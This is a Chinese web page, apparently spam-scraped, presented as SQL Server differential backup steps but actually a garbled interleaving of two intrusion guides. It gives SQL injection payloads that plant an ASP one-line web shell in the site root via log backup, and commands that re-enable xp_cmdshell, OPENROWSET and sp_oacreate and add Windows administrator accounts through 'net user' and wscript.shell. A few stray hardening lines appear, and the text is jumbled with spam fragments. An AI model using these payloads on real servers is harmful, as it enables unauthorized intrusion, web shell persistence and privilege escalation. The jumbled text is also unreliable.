sqlserver 手工实现差异备份的步骤

sqlserver 手工实现差异备份的步骤

手工实现差异备份的步骤

在入侵过程中,得到SQLserver的权限,想进一步得到system权限的方法总结

字符型:

*************************** 利用xp_cmdshell
***********************************

1、恢复当前库
;alter database 当前库 set RECOVERY FULL–

一.更改sa口令方法:
用sql综合利用工具连接后,执行命令:
exec sp_password NULL,’新密码’,’sa’
(提示:慎用!)

2、建表cmd
;create table cmd (a image)–

二.简单修补sa弱口令.

3、备份当前库到D:\cmd1
;backup log 当前库 to disk = ‘D:\cmd1’ with init–

方法1:查询分离器连接后执行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]’) and
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1)

4、插入一句话代码到创建的表cmd
;insert into cmd (a) values
(‘<%%25**ecute(request(“a”))%%25>’)– 

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’

5、备份一句话代码到站点根目录
;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–

然后按F5键命令执行完毕

6、完成
;drop table 创建的表–

方法2:查询分离器连接后
第一步执行:use master
第二步执行:sp_dropextendedproc ‘xp_cmdshell’
然后按F5键命令执行完毕

数字型

三.恢复xp_cmdshell
简单恢复xp_cmdshell
;EXEC master.dbo.sp_addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’–

1、恢复当前库
‘;alter database 当前库 set RECOVERY FULL–

1.未能找到存储过程’master..xpcmdshell’.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname
=’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

2、创建表cmd
‘;create table cmd (a image)–

2.无法装载 DLL xpsql70.dll
或该DLL所引用的某一DLL。原因126(找不到指定模块)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc “xp_cmdshell”
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

3、备份当前库到D:\cmd1
‘;backup log 当前库 to disk = ‘D:\cmd1’ with init–

3.无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:
127(找不到指定的程序)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步执行:exec sp_美高梅59599,addextendedproc ‘xp_cmdshell’,’xpweb70.dll’
然后按F5键命令执行完毕

4、插入一句话代码到创建的表cmd
‘;insert into cmd (a) values
(‘<%%25**ecute(request(“a”))%%25>’)– 

四、利用xp_cmdshell
exec master..xp_cmdshell ‘ver’
exec master.dbo.xp_cmdshell ‘net user test test /add’
exec master.dbo.xp_cmdshell ‘net localgroup administrators test /add’

5、备份一句话代码到站点根目录
‘;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–

五.SQL Server2005在默认情况下,一些存储过程是关闭着的,需要命令打开
开启xp_cmdshell:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure’xp_cmdshell’, 1;RECONFIGURE;
关闭xp_cmdshell:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure’xp_cmdshell’, 0;RECONFIGURE;

6、完成
‘;drop table 创建的表–

开启’OPENROWSET’:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec
sp_configure’Ad Hoc Distributed Queries’,1;RECONFIGURE;

sa权限创建管理员用户

开启’sp_oacreate’:
exec sp_configure ‘show advanced options’, 1;RECONFIGURE;exec
sp_configure’Ole Automation Procedures’,1;RECONFIGURE;

1、判断是否有注入;and 1=1 ;and 1=2 
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

*******************************
利用wscript.shell
*****************************************

2、添加系统的管理员
;exec master.dbo.xp_cmdshell ‘net user wk wk90/add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators wk /add’;–

使用wscript.shell直接添加系统帐户:
查询分离器连接后,xp或2003server系统下使用:

逍遥复仇:有工具我是一定不会手工的,麻烦。

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec
sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net
user 新用户 密码 /add’

admin

网站地图xml地图